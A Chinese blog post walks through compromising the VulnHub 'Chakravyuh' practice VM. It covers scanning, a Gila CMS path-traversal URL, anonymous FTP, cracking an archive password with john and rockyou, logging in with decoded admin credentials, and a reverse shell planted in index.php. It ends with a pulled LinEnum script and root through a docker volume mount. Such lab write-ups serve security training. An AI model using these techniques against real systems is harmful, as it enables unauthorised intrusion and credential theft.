vulnhub-Chakravyuh打靶过程

最新推荐文章于 2023-06-25 03:09:44 发布
最新推荐文章于 2023-06-25 03:09:44 发布
阅读量4.3k 收藏 1
点赞数 2
文章标签: 网络安全 php python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dwrnxjlove/article/details/123352010
版权

chakravyuh靶机: https://www.vulnhub.com/?q=Chakravyuh.

1、使用kali扫描网段:netdiscover:
在这里插入图片描述

2、通过分析可知192.168.1.8应该是靶机所在的ip,使用nmap对目标ip进行扫描:nmap -p- -A 192.168.1.8
在这里插入图片描述

3、可以发现目标主机开放了三个端口->22,80,65530 对应的服务为ssh web ftp
4、查看web端口提供的服务:
在这里插入图片描述

5、通过主页面显示只是一个简单的web页面,并没有提供什么其他的服务
6、进行目录扫描:python3.8 dirsearch.py -u http://192.168.1.8 -e*
在这里插入图片描述

7、扫描结束后发现4个大目录:/gila;/index.html;/javascript;/phpmyadmin
在这里插入图片描述

8、看到phpmyadmin后我就想当兴奋立刻访问看看能不能用弱口令进入:
在这里插入图片描述

9、报错了,说明不存在基本的弱口令,这时候如果你觉得自己的字典够强大的话就可以尝试使用字典进行爆破(我并没有这麽强的字典),我就查看了这个mysql的版本,刚刚的扫描结果又这么一个路径:http://192.168.1.8/phpmyadmin/doc/html/index.html访问:
在这里插入图片描述

10、可以看到数据库的版本为4.6.6,去网上看看4.6.6的版本有没有对应的漏洞可以使用:
在这里插入图片描述

11、并没有相关的漏洞,因此此路不通
12、刚刚的目录扫描还有其他的目录,我们访问一下http://192.168.1.8/gila:
在这里插入图片描述

13、通过网页信息可以发现这是一个cms,在网上查看这个cms有没有相应的漏洞 :
在这里插入图片描述

14、发现了一个本地文件包含的漏洞,通过这个payload编写我们自己的payload:http://192.168.1.8/gila/admin/fm/?f=src…/…/…/…/…/…/…/…/…/etc/password
在这里插入图片描述

15、发现需要登录,尝试弱口令:admin,admin和万能密码登录均不对:
在这里插入图片描述

16、回头再看看端口扫描的信息:
在这里插入图片描述

17、看到里面提供的ftp服务,并且里面有一个共享文件夹 pub,尝试ftp连接 ftp 192.168.1.8 65530 使用匿名登录Anonymous:
在这里插入图片描述

18、发现里面有个压缩包,将压缩包下载下来:get arjun.7z
19、解压下载的文件,发现解压的时候需要密码:
在这里插入图片描述

20、我们可以通过工具进行爆破,也可以使用kali里面自带的rockyou.txt进行撞库
21、使用rockyou.txt 进行撞库,先将压缩包转换为hash python 7z.py arjun.7z > hash:
在这里插入图片描述

22、生成了一个hash的文件,我们使用john使用rockyou进行过撞库
John --wordlist=/usr/share/wordlists/rockyou.txt hash:
在这里插入图片描述

23、查看撞库结果 john hash --show:
在这里插入图片描述

24、可以看到压缩包的密码为family,用这个密码进行解压:
在这里插入图片描述

25、可以得到一个secret.txt的文件,查看一下:
在这里插入图片描述

26、发现是一段编码,从结构上来看,猜测是base64编码,进行解码:
import base64
a=‘Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=’
b=base64.b64decode(a)
print(b)
在这里插入图片描述

27、解码之后得到结果:gila:admin@gmail.com:princesa ,这个看到gila 看到admin 想到应该是网站后台的登录账号密码去尝试一下:
在这里插入图片描述

28、发现可以登录进来,并且发现了一个index.php是我们可以修改的 用phpinfo测试一下:
在这里插入图片描述

29、发现可以进行执行,我们将index里添加上我们反弹shell的木马:
在这里插入图片描述

30、监听本地端口nc -lvp 4444:
在这里插入图片描述

31、将终端美化一下 python3 -c ‘import pty;pty.spawn(“bin/bash”)’:
在这里插入图片描述

32、查看现在的权限 id:
在这里插入图片描述

33、发现并不是root用户,需要想办法提权,先使用脚本跑一边,给提权提供思路,先将脚本下载到目标主机 在本地开一个web服务 python -m SimpleHTTPServer:
在这里插入图片描述

34、将脚本下载到目标主机 wget 192.168.1.6:8000/LinEnum.sh:
在这里插入图片描述

35、下载下来完成给它执行权限,并运行 chmod 777 LinEnum.sh并运行./LinEnum.sh:
在这里插入图片描述

36、可以看到这里面有个docker的提权的路径,尝试一下,查看所有的docker 镜像 docker ps -all:
在这里插入图片描述

37、可以看到一个alpine的镜像,我们可以将root的所有目录都映射到这个镜像下
docker run -v /root:/mnt -it alpine:
在这里插入图片描述

38、就提权成功了,得到了完整的root权限。

伟已茹心
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶场】Breach1打靶过程记录
didiplus
07-18 1388
Vulnhub是一个提供各种漏洞环境的一个靶场平台,大部分都是虚拟机镜像文件,预先设计各种漏洞需要使用VMware或者VirtualBox运行,每个镜像都有破解的目标,从启动虚拟机到获取系统的root权限和查看flag。.........
vulnhub chakravyuh
底层社会中的弱智
03-17 547
扫描局域网靶机 目标为192.168.2.8 扫描端口: 分析: 22端口为ssh openssh 7.6p1版本 暂无漏洞 80端口http服务 apache中间件 65530端口为ftp服务存在匿名登陆 使用匿名登录ftp 下载arjun.7z 存在解压密码 尝试破解 使用到的脚本文件 https://github.com/truongkma/ctf-t...
【每日打靶练习】Vulnhub靶机平台-tomato
leo788的博客
12-30 1455
在网页的下边找到包含内容,通过返回信息中的用户属性得到信息:root用户可以执行shell,下方的tomato用户也可以执行shell,继续。尝试ssh连接,这里使用错误的用户名和错误的密码,输入三次后,写入日志中,检查一下log,成功获取到日志信息,可通过修改ruser来进行注入。刷新日志进行查看,发现注入未显示,证明注入成功,木马被作为代码执行,若显示则失败,代码木马作为文本执行。包含失败,这里未开放远程包含,同时本地包含文件无可再利用—》转换思路。执行后的匹配到相应漏洞,选择可能性高的来试一下。
vulnhub靶场-Sputnik
qq_42947816的博客
10-16 1559
Sputnik是一款易用级别的boot2root机器,旨在为安全爱好者提供学习和实践危害机器和渗透测试的挑战。
渗透测试part(三):Vulhub配置及打靶(以Drupal CVE-2018-7600为例)
m0_56592545的博客
06-25 1123
本系列总共分成了三个部分,在第一部分中对渗透测试进行了简要的概述,第二部分通过VMware搭建了Vulnhub的一个靶机,第三部分则在Ubuntu操作系统中基于Vulhub搭建了一个靶机并借助kali的Metasploit工具快速完成了对Drupal的渗透。t=N5K3t=N5K3t=N5K3t=N5K3t=N5K3打靶-vulhub靶场-drupal-CVE-2018-7600_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1Tv4y1C7GC/?
打靶练习vulnhub: my-cmsms
04-10
打靶练习vulnhub: my-cmsms
打靶练习vulnhub:Insanity-Hosting
03-19
打靶练习vulnhub:Insanity-Hosting
地空战-打靶游戏.rar
04-07
很抱歉,根据您提供的信息,"地空战-打靶游戏.rar"似乎是一个游戏压缩包,而非与IT专业知识相关的文件。通常,这类压缩包包含的游戏文件、设置文档、可能的安装脚本等,并不涉及传统的IT技术知识,例如编程语言、...
易语言地空战-打靶游戏
07-17
《易语言地空战-打靶游戏》是一款利用易语言编程设计的射击类游戏,旨在提供一种简单而有趣的游戏体验,让玩家通过控制地面或空中单位进行射击目标,提高反应速度和策略思考能力。易语言作为中国本土开发的一款普及...
35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码
04-17
35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源...
红队打靶:JARBAS详细打靶思路(vulnhub
Bossfrank的博客
06-03 1639
本文是vulnhub靶机JARBAS详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6621
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash。
[工具教程]Kali中的工具John常见使用环境
m0_61155226的博客
03-01 6381
Kali中的John使用方法
linux下nc的使用
weixin_33962923的博客
04-26 238
linux下nc的使用 今天在饮水思源上闲逛,看到了一个贴子关于Linux下nc命来实现文件传输,进行学习了解了一下。 发送端: cattest.txt | nc -l -p 6666 或者nc -l -p 6666 < test.txt 【监听6666端口,等待连接】(设发送端IP为10.20.133.152) 接收端: nc 10.20.13...
john快速破解各种散列hash
Ramona的博客
12-14 5707
0x01 john工具安装: kali系统自带的有,也可以自己安装在其他linux和windows系统上,关于安装步骤网上都有可自行百度。 0x02 john常用选项 具体的其他选项可通过john --help查看,这列举常用的几个: 1.  --single 简单破解模式,也是默认的执行模式,就是根据用户和家目录名进行一些简单的变形猜解 2.--incremental 逐个遍历模式[其...
渗透测试--5.3.使用john破解密码
我是个好人呀,????
05-17 3385
John the Ripper一款免费、开源的暴力密码破解器,它有多平台版本,支持目前大多数的加密算法,如DES、MD4、MD5等。该软件破解密码方式简单而粗暴,理论上只要时间上面允许,该软件可以破译绝大多数用户密码。John the Ripper免费的开源软件,支持目前大多数的加密算法,如DES、MD4、MD5等。它支持多种不同类型的系统架构,包括Unix、Linux、Windows、DOS模式、BeOS和OpenVMS,主要目的是破解不够牢固的Unix/Linux系统密码。
CTF训练笔记(一)- SSH私钥泄露
morrino的博客
01-07 1890
本文作为CTF训练笔记系列的第一章,详细描述了搭建环境时如何配置网络。 总结:细节非常重要,flag往往会藏在意想不到的地方,不要放过任何可疑文件,根据提示逐步挖掘所需信息。[CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
使用hashcat获取哈希值
热门推荐
weixin_46021205的博客
02-04 1万+
前期准备 破解压缩包密码需要用到两个工具,分别是John the Ripper jumbo和hashcat。这两款软件分别下载windows版和binaries版就可以在windows上运行了。两个软件都是开源软件,所以也不用担心病毒。 还需要准备一个有密码的压缩包,这里以rar压缩包为例。 最后因为要使用GPU来运算,可能需要预先安装cuda环境之类的,这点没有深入研究。 获取压缩包哈希值 在john的路径中打开cmd:打开john\run\文件夹,在地址栏中输入cmd然后回车就行。 获取压缩包的路径,
靶机渗透测试(HA: Chakravyuh
@小张小张的博客
11-07 1311
靶机渗透测试(HA: Chakravyuh): Vulnhub靶机 HA: Chakravyuh 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(====) 目标:Close your eyes and feel the heat of being in the middle of the Chakravyuh. The Epic Battle formation that is said to uncrackable. Can you crac
hc-sr04超声波测距加上激光打靶
最新发布
05-26
HC-SR04超声波测距模块是一种常用的非接触式测距传感器,通过发送超声波脉冲并接收其回波来测量距离。具体来说,它通过向目标物体发送一定频率的超声波脉冲,并计算返回时间来测量目标物体与传感器之间的距离。 激光打靶是一种常见的游戏或者训练方式,通过使用激光发射器和激光接收器来模拟真实射击场景。通常情况下,激光打靶需要先进行目标的定位和距离的测量,这时候HC-SR04超声波测距模块就可以派上用场了。当我们知道目标物体与传感器之间的距离后,可以将激光发射器对准目标并发射激光,同时在目标处放置激光接收器。当激光击中目标并被接收器接收到时,我们就可以得到一个命中信号,并计算出命中的位置。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值